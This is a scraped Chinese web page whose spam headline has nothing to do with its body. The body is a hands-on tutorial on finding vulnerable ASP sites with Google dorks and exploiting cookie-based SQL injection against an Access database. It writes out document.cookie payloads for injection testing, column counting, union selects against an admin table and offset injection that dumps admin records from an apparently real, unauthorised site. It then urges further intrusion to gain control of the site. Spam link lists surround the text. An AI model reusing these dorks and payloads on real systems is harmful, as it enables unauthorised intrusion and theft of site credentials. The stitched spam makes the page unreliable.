当前位置: 首页 > news >正文

北京空间优化平台seo优化官网

北京空间优化平台,seo优化官网,做蛋糕哪个教程网站好,网上运营培训班目录 谷歌语法-信息收集 cookie注入 实战演示 信息收集 SQL注入判断 查找字段数 爆破表名 输出结果 总结 hack渗透视频教程,扫码免费领 谷歌语法-信息收集 1.查找带有ID传参的网站(可以查找sql注入漏洞) inurl:asp idxx 2.查找网站后…

目录

 

谷歌语法-信息收集

cookie注入

实战演示

信息收集

SQL注入判断

查找字段数

爆破表名

输出结果

总结

                        hack渗透视频教程,扫码免费领


谷歌语法-信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

cookie注入

1、cookie注入:
cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了,我们可以修改cookie值进入数据库中进行sql注入
Cookie注入在ASP网站中和低版本php中才会有,ASP常用的数据库是Accsess。

2、Access数据库:
access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计,并且access数据库无库名。
access数据库在查询语句时和mysql不同,access比较严谨
所以要select 字段 from 表名
函数exists(select*from 表名)可以验证这个表名是否存在,这个表名还可以用burp来爆破

3、怎样修改cookie:
用burp抓包改
用插件改(需要自己编码一下)
阅览器自带js进行设置(document.cookie=’id=’+escape(“代码”))

实战演示

信息收集

通过谷歌语法查找带有asp文件下的id传参,发现有很多带有id=1传参的网站,可以挨个试一试,id传参数可以任意修改。
发现一家id=104的网站

SQL注入判断

废话不多说直接判断是否存在sql注入,and 1=2发现网站报错,但是1=1页面显示正常,说明存在sql注入

  1. document.cookie='id='+escape("104 and 1=1")
  2. document.cookie='id='+escape("104 and 1=2")

查找字段数

直接查找一下字段数,发现字段数为10

 
  1. document.cookie='id='+escape("104 order by 10")

爆破表名

因为这是一个ACCESS数据库,没有库名,所以我们可以使用burp爆破出表名,这里就不给大家展示了。

 
  1. document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,8,9,10 from admin")


发现存在admin表,且回显点是2和5

输出结果

使用偏移注入查看admin表的字段数并且把表里的内容显示出来

 
  1. document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,admin.* from admin")
  2. document.cookie='id='+escape("104 union select 1,2,3,admin.*,7,8,9,10 from admin")

总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.通过cookie绕过注入
4.爆破表名
5.偏移注入查找表的字段数
6.最后可以通过爆破目录查找登陆框,进入后台进一步渗透拿权限
这次实战记录很适合新手小白挖SRC,希望多多支持!~

                        hack渗透视频教程,扫码免费领

http://www.qdjiajiao.com/news/6907.html

相关文章:

  • wordpress国外主题加速官方正版清理优化工具
  • 用织梦系统做网站不受国内限制的浏览器下载
  • 如何制作旅游网站百度集团总部在哪里
  • 护肤品网站建设的意义百度网站大全首页
  • 网络优化论文seo权重是什么意思
  • 做项目的网站安卓排名优化
  • 做网站要用什么软件seo1域名查询
  • 松江新城建设投资有限公司网站百度信息流代理
  • 网站短信验证码接口怎么做百度人工客服24小时电话
  • 网站攻击方式深圳全网营销型网站
  • 免费个人网站建设百度网址提交入口平台
  • 网站移动适配怎么做t和p在一起怎么做网站
  • 怎么看网站是否备案关键词排名怎样
  • 荥阳郑州网站建设百度关键词怎么做排名
  • 公司做网站的钱网银转账用途百度网盘电脑版下载
  • 2024最新一轮感冒病毒百度搜索引擎优化的推广计划
  • 企业管理软件都有哪些seo常用方法
  • 江油网站制作域名搜索
  • 环境艺术设计最好的大学seo外包公司一般费用是多少
  • 个人微信小程序教程星巴克seo网络推广
  • 不备案如何架设网站app拉新推广平台
  • 张家港网站建设正规seo多少钱
  • 幼儿园做网站微信平台的理由网站优化推广教程
  • 当富广州网站建设视频号的网站链接
  • 网站上可以做收藏按钮吗企业宣传文案
  • 郑州正岩建设集团网站百度怎么推广自己的网站
  • ICP备案和实际网站不是一个名字线下引流的八种推广方式
  • 网站建设人员岗位设置中国广告网
  • 石家庄网站建设成功案例最新的销售平台
  • 广州网站开发定制福州专业的seo软件